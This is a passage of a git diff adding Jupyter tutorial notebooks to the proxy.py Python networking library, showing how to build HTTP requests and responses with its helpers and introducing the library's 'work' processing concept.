a connection close header, simply pass `conn_close=True`" + ] + }, + { + "cell_type": "code", + "execution_count": 5, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\n'" + ] + }, + "execution_count": 5, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "build_http_request(\n", + " method=httpMethods.GET,\n", + " url=b'/',\n", + " headers={b'Host': b'jaxl.com'},\n", + " conn_close=True,\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "For `POST` requests, provide the `body` attribute" + ] + }, + { + "cell_type": "code", + "execution_count": 6, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'POST / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nContent-Length: 21\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\nkey=value&hello=world'" + ] + }, + "execution_count": 6, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "build_http_request(\n", + " method=httpMethods.POST,\n", + " url=b'/',\n", + " headers={b'Host': b'jaxl.com'},\n", + " body=b'key=value&hello=world',\n", + " content_type=b'application/x-www-form-urlencoded',\n", + " conn_close=True,\n", + ")" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "For chunked data, simply include a `Transfer-Encoding` header. This will omit the `Content-Length` header then:" + ] + }, + { + "cell_type": "code", + "execution_count": 9, + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "b'POST / HTTP/1.1\\r\\nHost: jaxl.com\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: application/x-www-form-urlencoded\\r\\nUser-Agent: proxy.py v2.4.0rc9.dev8+gea0253d.d20220126\\r\\nConnection: close\\r\\n\\r\\n5\\r\\nkey=v\\r\\n5\\r\\nalue&\\r\\n5\\r\\nhello\\r\\n5\\r\\n=worl\\r\\n1\\r\\nd\\r\\n0\\r\\n\\r\\n'" + ] + }, + "execution_count": 9, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "from proxy.http.parser import ChunkParser\n", + "\n", + "build_http_request(\n", + " method=httpMethods.POST,\n", + " url=b'/',\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " b'Transfer-Encoding': b'chunked',\n", + " },\n", + " body=ChunkParser.to_chunks(b'key=value&hello=world', chunk_size=5),\n", + " content_type=b'application/x-www-form-urlencoded',\n", + " conn_close=True,\n", + ")" + ] + } + ], + "metadata": { + "interpreter": { + "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7" + }, + "kernelspec": { + "display_name": "Python 3.10.0 64-bit ('venv310': venv)", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.10.0" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +} diff --git a/tutorial/responses.ipynb b/tutorial/responses.ipynb new file mode 100644 index 0000000000..f74f2eb0ab --- /dev/null +++ b/tutorial/responses.ipynb @@ -0,0 +1,328 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Http Response\n", + "\n", + "## Usage\n", + "\n", + "To construct a response packet you have a variety of facilities available.\n", + "\n", + "Previously we saw how to parse HTTP responses using `HttpParser`. Of-course, we can also construct a response packet using `HttpParser` class." + ] + }, + { + "cell_type": "code", + "execution_count": 2, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nContent-Length: 0\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "from proxy.http.parser import HttpParser, httpParserTypes\n", + "from proxy.common.constants import HTTP_1_1\n", + "\n", + "response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n", + "response.code = b'200'\n", + "response.reason = b'OK'\n", + "response.version = HTTP_1_1\n", + "\n", + "print(response.build_response())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "But, this is a painful way to construct responses. Hence, other high level abstractions are available.\n", + "\n", + "Example, following one liner will give us the same response packet." + ] + }, + { + "cell_type": "code", + "execution_count": 7, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nContent-Length: 0\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "from proxy.http.responses import okResponse\n", + "\n", + "print(okResponse().tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Notice how `okResponse` will always add a `Content-Length` header for you.\n", + "\n", + "You can also customize other headers" + ] + }, + { + "cell_type": "code", + "execution_count": 5, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Length: 0\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " headers={\n", + " b'X-Custom-Header': b'my value',\n", + " },\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Let's add some content to our response packet" + ] + }, + { + "cell_type": "code", + "execution_count": 6, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Length: 11\\r\\n\\r\\nHello World'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " content=b'Hello World',\n", + " headers={\n", + " b'X-Custom-Header': b'my value',\n", + " },\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Note, how `okResponse` automatically added a `Content-Length` header for us.\n", + "\n", + "Depending upon `--min-compression-length` flag, `okResponse` will also perform compression for content.\n", + "\n", + "Example, default value for min compression length is 20." + ] + }, + { + "cell_type": "code", + "execution_count": 16, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nX-Custom-Header: my value\\r\\nContent-Encoding: gzip\\r\\nContent-Length: 23\\r\\n\\r\\n\\x1f\\x8b\\x08\\x00F\\x0e\\xf1a\\x02\\xff\\xf3\\xf0\\xc0\\x02\\x00h\\x81?s\\x15\\x00\\x00\\x00'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " content=b'H' * 21,\n", + " headers={\n", + " b'X-Custom-Header': b'my value',\n", + " },\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "You can pass a custom value for `min_compression_length` kwarg to `okResponse`." + ] + }, + { + "cell_type": "code", + "execution_count": 6, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nHost: jaxl.com\\r\\nContent-Length: 21\\r\\n\\r\\nHHHHHHHHHHHHHHHHHHHHH'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " content=b'H' * 21,\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " },\n", + " min_compression_length=21,\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "Internally, `okResponse` uses `build_http_response` and hence you can also pass any argument also accepted by `build_http_response`. Example, it supports a `conn_close` argument which will add a `Connection: close` header. Simply, pass `conn_close=True`." + ] + }, + { + "cell_type": "code", + "execution_count": 7, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nHost: jaxl.com\\r\\nContent-Length: 11\\r\\nConnection: close\\r\\n\\r\\nHello World'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " content=b'Hello World',\n", + " headers={\n", + " b'Host': b'jaxl.com',\n", + " },\n", + " conn_close=True,\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "## Chunked Encoding\n", + "\n", + "You can also send chunked encoded responses." + ] + }, + { + "cell_type": "code", + "execution_count": 12, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n5\\r\\nHello\\r\\n5\\r\\n Worl\\r\\n1\\r\\nd\\r\\n0\\r\\n\\r\\n'\n" + ] + } + ], + "source": [ + "from proxy.http.parser import ChunkParser\n", + "\n", + "chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5)\n", + "response = okResponse(\n", + " content=chunks,\n", + " headers={\n", + " b'Transfer-Encoding': b'chunked',\n", + " },\n", + " # Avoid compressing chunks for demo purposes here\n", + " # Ideally you should omit this flag and send\n", + " # compressed chunks.\n", + " min_compression_length=len(chunks),\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + }, + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "If we omit the `min_compression_length` flag" + ] + }, + { + "cell_type": "code", + "execution_count": 13, + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "b'HTTP/1.1 200 OK\\r\\nTransfer-Encoding: chunked\\r\\nContent-Encoding: gzip\\r\\n\\r\\n\\x1f\\x8b\\x08\\x00\\xd3\\n\\xf1a\\x02\\xff3\\xe5\\xe5\\xf2H\\xcd\\xc9\\xc9\\xe7\\xe52\\xe5\\xe5R\\x08\\xcf/\\xca\\xe1\\xe52\\xe4\\xe5J\\xe1\\xe52\\xe0\\xe5\\xe2\\xe5\\x02\\x00\\x90S\\xbb/\\x1f\\x00\\x00\\x00'\n" + ] + } + ], + "source": [ + "response = okResponse(\n", + " content=chunks,\n", + " headers={\n", + " b'Transfer-Encoding': b'chunked',\n", + " },\n", + ")\n", + "\n", + "print(response.tobytes())" + ] + } + ], + "metadata": { + "interpreter": { + "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7" + }, + "kernelspec": { + "display_name": "Python 3.10.0 64-bit ('venv310': venv)", + "language": "python", + "name": "python3" + }, + "language_info": { + "codemirror_mode": { + "name": "ipython", + "version": 3 + }, + "file_extension": ".py", + "mimetype": "text/x-python", + "name": "python", + "nbconvert_exporter": "python", + "pygments_lexer": "ipython3", + "version": "3.10.0" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +} diff --git a/tutorial/welcome.ipynb b/tutorial/welcome.ipynb new file mode 100644 index 0000000000..12d0983f0e --- /dev/null +++ b/tutorial/welcome.ipynb @@ -0,0 +1,61 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Welcome\n", + "\n", + "## Background\n", + "\n", + "`proxy.py` was released on 20th August, 2013 as a single file HTTP proxy server implementation with no external dependencies. See the [first commit](https://github.com/abhinavsingh/proxy.py/commit/75044a72d9c7b4b8910ba551006b801eafdf3c47) and [read introductory blog](https://abhinavsingh.com/proxy-py-a-lightweight-single-file-http-proxy-server-in-python/) to get an insight about why `proxy.py` was created.\n", + "\n", + "## Introduction\n", + "\n", + "Today, `proxy.py` has matured into a full blown networking library with focus on being lightweight, ability to deliver maximum performance while being extendible. Unlike other Python servers, `proxy.py` doesn't need a `WSGI` or `UWSI` frontend, which then usually has to be placed behind a reverse proxy e.g. `Nginx` or `Apache`. Of-course, `proxy.py` can be placed directly behind a load-balancer _(optionally capable of speaking HA proxy protocol)_.\n", + "\n", + "## Asyncio\n", + "\n", + "TBD\n", + "\n", + "## The Concept Of Work\n", + "\n", + "`proxy.py` core is written with a high level concept of `work`.\n", + "\n", + "- A running instance can receive `work` from one or multiple `sources`\n", + " - Example, when `proxy.py` starts, an accepted client connection is a `work` coming from TCP socket `sources`\n", + "- Handlers can be written to process various types of `work`\n", + " - Example, `HttpProtocolHandler` handles HTTP client connections `work`\n", + "- A client connection can come from a variety of `sources`\n", + " - TCP sockets\n", + " - UDP sockets\n", + " - Unix sockets\n", + " - Raw sockets\n", + "\n", + "In fact, `work` can be any processing unit. It doesn't have to be a client connection. Example:\n", + "\n", + "- A file on disk can act as the `source` and each line in that file as the `work` definition\n", + "- Imagine tailing a file on disk as `source` and processing each line as a separate `work` object\n", + "- If you want, each line in the file can also be a URL to be scrapped or download\n", + "- If you want, your `work` handlers can append new URLs _(discovered by scrapping previous URL entries)_ back in the file, creating an infinite feedback loop between the `work` processing core.\n", + "\n", + "And just like that we have created a web scraper!!!\n", + "\n", + "To extend this generic concept, now imagine a distributed queue as the `source` of our `work`, where each published message in the queue is our `work` payload. Some examples of such `sources` can be:\n", + "- A `Redis` channel\n", + "- Google Cloud PubSub channel\n", + "- Kafka queues\n", + "\n", + "And just like that we have created a distributed `work` executor!!!" + ] + } + ], + "metadata": { + "language_info": { + "name": "python" + }, + "orig_nbformat": 4 + }, + "nbformat": 4, + "nbformat_minor": 2 +}